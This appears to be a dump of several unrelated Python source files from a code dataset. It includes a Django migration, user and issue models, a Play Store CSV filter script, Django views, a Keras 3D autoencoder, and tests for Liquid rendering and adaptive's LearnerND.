        migrations.CreateModel(
            name='SubawardView',
            fields=[
                ('id', models.IntegerField(primary_key=True, serialize=False)),
                ('keyword_ts_vector', django.contrib.postgres.search.SearchVectorField()),
                ('award_ts_vector', django.contrib.postgres.search.SearchVectorField()),
                ('recipient_name_ts_vector', django.contrib.postgres.search.SearchVectorField()),
                ('latest_transaction_id', models.IntegerField()),
                ('last_modified_date', models.DateField()),
                ('subaward_number', models.TextField()),
                ('amount', models.DecimalField(decimal_places=2, max_digits=20)),
                ('total_obl_bin', models.TextField()),
                ('description', models.TextField(blank=True, null=True)),
                ('fiscal_year', models.IntegerField()),
                ('action_date', models.DateField()),
                ('award_report_fy_month', models.IntegerField()),
                ('award_report_fy_year', models.IntegerField()),
                ('award', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, to='awards.Award')),
                ('generated_unique_award_id', models.TextField()),
                ('awarding_agency_id', models.IntegerField()),
                ('funding_agency_id', models.IntegerField()),
                ('awarding_toptier_agency_name', models.TextField()),
                ('awarding_subtier_agency_name', models.TextField()),
                ('funding_toptier_agency_name', models.TextField()),
                ('funding_subtier_agency_name', models.TextField()),
                ('place_of_performance', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, to='references.Location')),
                ('recipient', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, to='references.LegalEntity')),
                ('award_type', models.TextField()),
                ('prime_award_type', models.TextField()),
                ('cfda_id', models.IntegerField()),
                ('piid', models.TextField()),
                ('fain', models.TextField()),
                ('business_categories', django.contrib.postgres.fields.ArrayField(base_field=models.TextField(), default=list, size=None)),
                ('recipient_name', models.TextField()),
                ('prime_recipient_name', models.TextField()),
                ('recipient_unique_id', models.TextField()),
                ('parent_recipient_unique_id', models.TextField()),
                ('pulled_from', models.TextField()),
                ('type_of_contract_pricing', models.TextField()),
                ('type_set_aside', models.TextField()),
                ('extent_competed', models.TextField()),
                ('product_or_service_code', models.TextField()),
                ('product_or_service_description', models.TextField()),
                ('cfda_number', models.TextField()),
                ('recipient_location_country_code', models.TextField()),
                ('recipient_location_country_name', models.TextField()),
                ('recipient_location_state_code', models.TextField()),
                ('recipient_location_county_code', models.TextField()),
                ('recipient_location_county_name', models.TextField()),
                ('recipient_location_zip5', models.TextField()),
                ('recipient_location_congressional_code', models.TextField()),
                ('pop_country_code', models.TextField()),
                ('pop_country_name', models.TextField()),
                ('pop_state_code', models.TextField()),
                ('pop_county_code', models.TextField()),
                ('pop_county_name', models.TextField()),
                ('pop_city_code', models.TextField()),
                ('pop_zip5', models.TextField()),
                ('pop_congressional_code', models.TextField()),
            ],
            options={
                'db_table': 'subaward_view',
                'managed': False,
            },
        ),
        migrations.CreateModel(
            name='SummaryStateView',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('action_date', models.DateField()),
                ('fiscal_year', models.IntegerField()),
                ('type', models.TextField()),
                ('pulled_from', models.TextField()),
                ('distinct_awards', django.contrib.postgres.fields.ArrayField(base_field=models.TextField(), default=list, size=None)),
                ('pop_country_code', models.TextField()),
                ('pop_state_code', models.TextField()),
                ('generated_pragmatic_obligation', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
                ('federal_action_obligation', models.DecimalField(blank=True, decimal_places=2, max_digits=20, null=True)),
                ('original_loan_subsidy_cost', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
                ('face_value_loan_guarantee', models.DecimalField(blank=True, decimal_places=2, max_digits=23, null=True)),
                ('counts', models.IntegerField()),
            ],
            options={
                'db_table': 'summary_state_view',
                'managed': False,
            },
        ),
    ]
|
"""User model"""
# local import
from .db_config import db
from api.models.Base.Base_model import BaseModel
class User(BaseModel):
    """User account model (SQLAlchemy), extending the shared BaseModel."""
    # table name
    __tablename__ = 'users'
    # whether the account's e-mail has been verified
    verified = db.Column(db.Boolean, default=False)
    first_name = db.Column(db.String(80), nullable=False)
    last_name = db.Column(db.String(80), nullable=False)
    # auth/session token — presumably a JWT; confirm against the auth layer
    token = db.Column(db.String, nullable=True)
    username = db.Column(db.String(80), unique=True, nullable=False)
    email = db.Column(db.String(120), unique=True, nullable=False)
    # hashed password (nullable, e.g. for externally-authenticated users — verify)
    password = db.Column(db.String, nullable=True)
    # token/hash used during the password-reset flow
    password_reset = db.Column(db.String, nullable=True)
    def __repr__(self):
        return '<User {}>'.format(self.email)
|
from .utils import assert_raises
from render_liquid import LiquidRenderer, JobError
def test_renderer():
    """Round-trip a small Liquid template and check bad-input error handling."""
    renderer = LiquidRenderer()
    template = r"""{{greeting | capitalize}}, {{name | append:'!'}}"""
    # Does it work?
    out = renderer.render(template, {'greeting': 'hello', 'name': 'world'})
    assert out == 'Hello, world!', out
    # Try to break it
    assert_raises(JobError, renderer.render, 1, 2)
    assert_raises(JobError, renderer.render, 3, 4)
    # Does it still work?
    out = renderer.render(template, {'greeting': 'ayy', 'name': 'lmao'})
    assert out == 'Ayy, lmao!', out
|
# Google Play Store Data Filter
# Authored by Matthew Steuerer, Nikhil Sankepalli, and Seth Curry
# October 7th, 2020
# Demonstrates the use of Lists is Python with 2018 Google Play Store Data
# Data Source URL: https://www.kaggle.com/lava18/google-play-store-apps
# Initial Ideas: create a list of objects where each entry in the list is an app object
# Each app will have attributes that correspond to column titles
# The user needs to be able to filter on up to three of these attributes
# User inputs their criteria and the program needs to find and count all records that match
import csv
# Class to represent an app object and all its properties (columns) from the data source
# Class approach was abandoned, it complicated processing unnecessarily but is good object review in python
class GoogleApp:
    """One row of the Play Store CSV as an object (one attribute per column).

    NOTE(review): this class-based approach was abandoned in favour of the
    plain-list representation (appList2), but instances are still built for
    every CSV row.
    """
    def __init__(self, app, category, rating, reviews, size, installs, type, price, contentRating, genres, lastUpdated,
                 currentVer, androidVer):
        # NOTE: the parameter name `type` shadows the builtin; kept because
        # existing callers pass all thirteen columns positionally.
        self.app = app
        self.category = category
        self.rating = rating
        self.reviews = reviews
        self.size = size
        self.installs = installs
        self.type = type
        self.price = price
        self.contentRating = contentRating
        self.genres = genres
        self.lastUpdated = lastUpdated
        self.currentVer = currentVer
        self.androidVer = androidVer
    # String Representation of Google App Object (How its displayed once its printed)
    def __str__(self):
        # NOTE(review): each continuation adds " " to a string already ending
        # in " ", so fields after `reviews` are separated by double spaces —
        # preserved as-is since output formatting is observable behaviour.
        appString = self.app + " " + self.category + " " + self.rating + " " + self.reviews + " "
        appString = appString + " " + self.size + " " + self.installs + " " + self.type + " "
        appString = appString + " " + self.price + " " + self.contentRating + " " + self.genres + " "
        appString = appString + " " + self.lastUpdated + " " + self.currentVer + " " + self.androidVer
        return appString
# Our list object which will hold the entire data source for processing
appList = [] # this was abandoned, but it was cool to make an entire list of objects
appList2 = []
# Use a reader object to read from csv file data source
with open('googleplaystore.csv') as csvFile:
    readCSV = csv.reader(csvFile, delimiter=',')
    i = 0  # NOTE(review): assigned but never used below
    for row in readCSV:
        # Note: needed to edit data source as one row had two columns that were null and reader object threw errors
        # For each row in the file, make an object and append it to the list of items
        appList.append(
            GoogleApp(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9], row[10], row[11],
                      row[12]))
        # Parallel plain-list representation actually used by the search functions.
        listFormOfApp = [row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9], row[10],
                         row[11], row[12]]
        appList2.append(listFormOfApp)
# Display function that only serves to format menu selection
def displayColumns():
    """Print the numbered menu of columns the user can filter on."""
    print("1. App Name \t 2. Category (All Caps) \t 3. Rating (1-5) \t 4. # of Reviews \t 5. Size (in MB) 6. # of "
          "Installs \n")
    print("7. Type (Paid or Free) \t 8. Price (don't enter $ sign) \t 9. Content Rating \t 10. Genres \t 11. Last "
          "Updated Date \n")
    print("12. Current Version (must be exact version #) \t 13. Android Version (minimum Android OS "
          "required (also must be exact version #) \n")
# Search for one term in one column of the given row list.
def searchOneTerm(columnInput1, searchList, searchedTerm1):
    """Print every row of *searchList* whose chosen column contains the term.

    :param columnInput1: 1-based column number (as shown by displayColumns).
    :param searchList: list of rows, each row a list of column strings.
    :param searchedTerm1: substring to look for.
    :return: number of matching rows (also printed; previously None was
        returned, so returning the count is backward-compatible).

    BUG FIX: the original indexed the global ``appList2`` instead of the
    ``searchList`` parameter it was given.
    """
    totalMatchingRows = 0
    for row in searchList:
        if searchedTerm1 in row[columnInput1 - 1]:  # account for 0-based lists
            print(row)
            totalMatchingRows += 1
    print("Total apps matching your search: " + str(totalMatchingRows))
    return totalMatchingRows
# Search for two term conditions to be true simultaneously.
def searchTwoTerms(columnInput1, columnInput2, searchList, searchedTerm1, searchedTerm2):
    """Print rows of *searchList* matching both column/term conditions.

    :return: number of matching rows (also printed; previously None).

    BUG FIX: the original indexed the global ``appList2`` instead of the
    ``searchList`` parameter it was given.
    """
    totalMatchingRows = 0
    for row in searchList:
        if searchedTerm1 in row[columnInput1 - 1] and searchedTerm2 in row[columnInput2 - 1]:
            print(row)
            totalMatchingRows += 1
    print("Total apps matching your search: " + str(totalMatchingRows))
    return totalMatchingRows
# Search for three conditions to be true simultaneously.
def searchThreeTerms(columnInput1, columnInput2, columnInput3, searchList, searchedTerm1, searchedTerm2, searchedTerm3):
    """Print rows of *searchList* matching all three column/term conditions.

    :return: number of matching rows (also printed; previously None).

    BUG FIX: the original indexed the global ``appList2`` instead of the
    ``searchList`` parameter it was given.
    """
    totalMatchingRows = 0
    for row in searchList:
        if (searchedTerm1 in row[columnInput1 - 1]
                and searchedTerm2 in row[columnInput2 - 1]
                and searchedTerm3 in row[columnInput3 - 1]):
            print(row)
            totalMatchingRows += 1
    print("Total apps matching your search: " + str(totalMatchingRows))
    return totalMatchingRows
# Requirements state user must be able to search by up to three values (Need to check up to 3 columns)
# Ask user how many search values they will enter (up to three allowed)
# First, prompt and ask user how many key values they will search for
print("Welcome to the Google Play Store Filter!")
print("This program allows you to select up to three search terms to find matching Google Apps")
print("Note: You will be prompted to select how many fields you'd like to search by first.")
print("Then, you will be prompted for your search term. Enter the term, followed by enter with no unnecessary spaces.")
print("Consult the User Guide Included with this application to learn how to effectively search.")
exitCondition = False # exit condition to terminate menu loop
while not exitCondition:
    # NOTE(review): int() raises ValueError on non-numeric input; any choice
    # other than 1-4 silently re-prompts.
    numberOfSearchTerms = int(input("Would you like to use 1, 2, or 3 search terms? Please type the number and press "
                                    "enter. Enter 4 to exit the program. \n"))
    if numberOfSearchTerms == 1:
        # offer all columns and let user pick one to search on
        # then search the entire list at that columns index and return all that match
        displayColumns()
        input1 = int(input("Which column above would you like to search on? \n"))
        searchTerm1 = input("What term do you wish to search for? \n")
        searchOneTerm(input1, appList2, searchTerm1)
    elif numberOfSearchTerms == 2:
        displayColumns()
        input1 = int(input("Select the first column you would like to search on: \n"))
        input2 = int(input("Select the second column you would like to search on: \n"))
        searchTerm1 = input("What is the first term you wish to search for? \n")
        searchTerm2 = input("What is the second term you wish to search for? \n")
        searchTwoTerms(input1, input2, appList2, searchTerm1, searchTerm2)
    elif numberOfSearchTerms == 3:
        displayColumns()
        input1 = int(input("Select the first column you would like to search on: \n"))
        input2 = int(input("Select the second column you would like to search on: \n"))
        input3 = int(input("Select the third column you would like to search on: \n"))
        searchTerm1 = input("What is the first term you wish to search for? \n")
        searchTerm2 = input("What is the second term you wish to search for? \n")
        searchTerm3 = input("What is the third term you wish to search for? \n")
        searchThreeTerms(input1, input2, input3, appList2, searchTerm1, searchTerm2, searchTerm3)
    elif numberOfSearchTerms == 4:
        # user requested exit
        exitCondition = True
|
from __future__ import annotations
from VersionControlProvider.Issue import Issue
from VersionControlProvider.IssueState import IssueState
class IssueDefault(Issue):
    """Default Issue implementation shared by version-control providers."""

    def get_ref(self) -> str:
        """Return the issue reference string (PREFIX followed by the number).

        :raises ValueError: if the issue has no number assigned yet.
        """
        if self.number is None:
            raise ValueError('Issue should have a number')
        return '{prefix!s}{number!s}'.format(prefix=self.PREFIX, number=self.number)

    # NOTE(review): defining __dict__ as a *method* shadows the normal
    # instance-attribute mapping; callers must invoke it as issue.__dict__().
    # Renaming (e.g. to to_dict()) would be cleaner but changes the interface.
    def __dict__(self) -> dict:
        """Serialize the issue to a dict, omitting unset optional fields."""
        issue: dict = {
            'title': self.title
        }
        if self.body is not None:
            issue['body'] = self.body
        if self.milestone is not None:
            issue['milestone'] = self.milestone
        if self.url is not None:
            issue['url'] = self.url
        if self.state is not None:
            issue['state'] = self.state.value
        if len(self.labels):
            issue['labels'] = self.labels
        if len(self.assignees):
            issue['assignees'] = self.assignees
        return issue
|
from apps.email import send_mail
from django.contrib.auth.decorators import login_required
from django.shortcuts import render,redirect
from django.contrib.auth.models import User
from django.contrib import messages
from django.db.models import Count
from django.urls import reverse
from django.views.decorators.csrf import csrf_exempt
from django.core.cache import cache
from .models import Bug_report
from .forms import BugReportForm
@csrf_exempt
def home(request):
    """Landing page.

    Redirects authenticated users to the homepage; on POST, forwards the
    contact-form message by e-mail and flashes a success/error message.
    """
    if request.user.is_authenticated:
        return redirect(reverse('homepage'))
    if request.method=='POST': # celery email
        name = request.POST.get('name')
        email = request.POST.get('email')
        message =f"{name} \n {email} \n {request.POST.get('message')} "
        mail_subject = 'Contact us : Sent by ' + name
        # send_mail returns a truthy value on success (delivery handled by apps.email)
        if(send_mail(mail_subject,message,'guru.online.classroom.portal@gmail.com',['guru.online.classroom.portal@gmail.com'])):
            messages.add_message(request,messages.SUCCESS,'Your message sent successfully.')
        else:
            messages.add_message(request,messages.ERROR,"An Error while sending your message.\
            Please try again or contact using given contact details.")
    return render(request,'intro.html')
def features(request):
    """Render the static features page."""
    return render(request, 'features.html')
def privacy(request):
    """Render the static privacy-policy page."""
    return render(request, 'privacy.html')
@login_required
def bug_report(request):
    """Show the bug-report form plus a cached top-20 reporter leaderboard;
    on a valid POST, save the report for the current user and bounce back
    to the referring page.

    BUG FIX: the final return statement carried a stray trailing ``|``
    token (file corruption) that made the module unparseable.
    """
    reporters = cache.get('reporters')
    if not reporters:
        # leaderboard: users ranked by how many bug reports they have filed
        reporters = (User.objects.filter(
            id__in=Bug_report.objects.values_list('user__id', flat=True)
            )
            .annotate(itemcount=Count('bug_report')).order_by('-itemcount')[:20]
        )
        cache.set('reporters', reporters, 15 * 60)  # cache for 15 minutes
    if request.method == "POST":
        form = BugReportForm(request.POST, request.FILES)
        if form.is_valid():
            form = form.save(commit=False)
            form.user = request.user
            form.save()
            # NOTE(review): assumes the Referer header is present; a direct
            # POST without it raises KeyError — confirm that is acceptable.
            return redirect(request.META['HTTP_REFERER'])
    else:
        form = BugReportForm()
    params = {
        'form': form,
        'reporters': reporters
    }
    return render(request, 'bug_report.html', params)
import numpy as np
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras.layers import Input, BatchNormalization, Conv3D, Dense, Flatten, Reshape, Conv3DTranspose
from tensorflow.keras.models import Model
# Input voxel grid shape, channels_first: (channels, depth, height, width).
input_shape = (1, 32, 32, 32)
# Size of the latent code produced by the encoder.
z_dim = 128
def get_model():
    """Build a 3D convolutional autoencoder over 1x32x32x32 voxel grids.

    Returns a dict with the input/output tensors, the latent tensor ``z``,
    and three Models: ``encoder``, ``decoder`` and the combined ``gae``.
    NOTE(review): ``enc_idx`` is only wired in as a second input of ``gae``
    and never used in the computation — presumably consumed by a custom
    loss elsewhere; confirm.
    """
    enc_in = Input(shape = input_shape)
    enc_idx = Input(shape = (1,), dtype = 'int32')
    # Encoder: three strided 3D convolutions (32 -> 16 -> 8 filters),
    # each halving the spatial resolution, with batch norm after each.
    enc_conv1 = BatchNormalization()(
        Conv3D(
            filters = 32,
            kernel_size = (4, 4, 4),
            strides = (2, 2, 2),
            padding = 'same',
            activation = 'relu',
            data_format = 'channels_first')(enc_in))
    enc_conv2 = BatchNormalization()(
        Conv3D(
            filters = 16,
            kernel_size = (4, 4, 4),
            strides = (2, 2, 2),
            padding = 'same',
            activation = 'relu',
            data_format = 'channels_first')(enc_conv1))
    enc_conv3 = BatchNormalization()(
        Conv3D(
            filters = 8,
            kernel_size = (4, 4, 4),
            strides = (2, 2, 2),
            padding = 'same',
            activation = 'relu',
            data_format = 'channels_first')(enc_conv2))
    # Flatten to the z_dim-dimensional latent code.
    z = Dense(
        units = z_dim,
        activation = 'relu')(Flatten()(enc_conv3))
    encoder = Model(enc_in, z)
    # Decoder: dense back to 512 = 8*4*4*4 units, reshape, then three
    # transposed convolutions mirroring the encoder (sigmoid output in [0, 1]).
    dec_in = Input(shape = (z_dim, ))
    dec_fc1 = Dense(
        units = 512,
        activation = 'relu')(dec_in)
    dec_unflatten = Reshape(
        target_shape = (8, 4, 4, 4))(dec_fc1)
    dec_conv1 = BatchNormalization()(
        Conv3DTranspose(
            filters = 16,
            kernel_size = (4, 4, 4),
            strides = (2, 2, 2),
            padding = 'same',
            activation = 'relu',
            data_format = 'channels_first')(dec_unflatten))
    dec_conv2 = BatchNormalization()(
        Conv3DTranspose(
            filters = 32,
            kernel_size = (4, 4, 4),
            strides = (2, 2, 2),
            padding = 'same',
            activation = 'relu',
            data_format = 'channels_first')(dec_conv1))
    dec_conv3 = Conv3DTranspose(
        filters = 1,
        kernel_size = (4, 4, 4),
        strides = (2, 2, 2),
        padding = 'same',
        activation = 'sigmoid',
        data_format = 'channels_first')(dec_conv2)
    decoder = Model(dec_in, dec_conv3)
    # Rebind dec_conv3 to the end-to-end reconstruction for the combined model.
    dec_conv3 = decoder(encoder(enc_in))
    gae = Model([enc_in, enc_idx], dec_conv3)
    return {'inputs': enc_in,
            'indices': enc_idx,
            'outputs': dec_conv3,
            'z': z,
            'encoder': encoder,
            'decoder': decoder,
            'gae': gae}
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class DataSource(object):
    """Abstract base class for every DataSource.

    A DataSource exposes two public operations, get and Refresh, and is
    constructed from a ServerInstance plus a Request (see servlet.py). The
    Request argument is None when the instance is created for refreshing.

    DataSources feed data to templates. They must not reach into other
    DataSources; shared logic or data belongs in a separate class.
    """

    def __init__(self, server_instance, request):
        # The base interface holds no state; subclasses pull what they need
        # from |server_instance|. |request| is None during refresh runs.
        pass

    def GetRefreshPaths(self):
        """Lists the paths (relative to _refresh/<data_source_name>/) that the
        task queue should hit to rebuild this DataSource's data. Each listed
        path is routed back to Refresh in a taskqueue task request.
        """
        return ['']

    def Refresh(self, path=None):
        """Handles a _refresh request. Implementations return a Future that
        resolves to the success or failure of the refresh.
        """
        raise NotImplementedError(self.__class__)

    def get(self, key):
        """Returns template-consumable data (a dict or list) for |key|. Runs
        against an offline file system, so only cached files are reachable.
        """
        raise NotImplementedError(self.__class__)
|
import math
import numpy as np
import pytest
from scipy.spatial import ConvexHull
from adaptive.learner.base_learner import uses_nth_neighbors
from adaptive.learner.learnerND import LearnerND, curvature_loss_function
def ring_of_fire(xy):
    """Test surface: a plane tilted along x plus a sharp Gaussian ridge on
    the circle x^2 + y^2 = d^2 (the 'ring of fire').

    Args:
        xy: pair (x, y) of coordinates.

    Returns:
        float value of the surface at (x, y).
    """
    width = 0.2   # controls how narrow the ridge is
    radius = 0.7  # radius of the ring
    x, y = xy
    dist_from_ring = x ** 2 + y ** 2 - radius ** 2
    return x + math.exp(-(dist_from_ring ** 2) / width ** 4)
def test_learnerND_inits_loss_depends_on_neighbors_correctly():
    """The default loss must not look beyond the simplex itself."""
    lrn = LearnerND(ring_of_fire, bounds=[(-1, 1), (-1, 1)])
    assert lrn.nth_neighbors == 0
def test_learnerND_curvature_inits_loss_depends_on_neighbors_correctly():
    """The curvature loss needs one ring of neighbouring simplices."""
    curvature_loss = curvature_loss_function()
    assert curvature_loss.nth_neighbors == 1
    lrn = LearnerND(
        ring_of_fire,
        bounds=[(-1, 1), (-1, 1)],
        loss_per_simplex=curvature_loss,
    )
    assert lrn.nth_neighbors == 1
def test_learnerND_accepts_ConvexHull_as_input():
    """A scipy ConvexHull may be passed as bounds instead of per-axis ranges."""
    hull = ConvexHull([(0, 1), (2, 0), (0, 0)])
    lrn = LearnerND(ring_of_fire, bounds=hull)
    assert lrn.nth_neighbors == 0
    # Bounding box of the triangle above: x in [0, 2], y in [0, 1].
    assert np.allclose(lrn._bbox, [(0, 2), (0, 1)])
def test_learnerND_raises_if_too_many_neigbors():
    """Losses that need more than one neighbour ring are not supported."""

    @uses_nth_neighbors(2)
    def two_ring_loss(*args):
        return 0

    assert two_ring_loss.nth_neighbors == 2
    with pytest.raises(NotImplementedError):
        LearnerND(
            ring_of_fire,
            bounds=[(-1, 1), (-1, 1)],
            loss_per_simplex=two_ring_loss,
        )
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.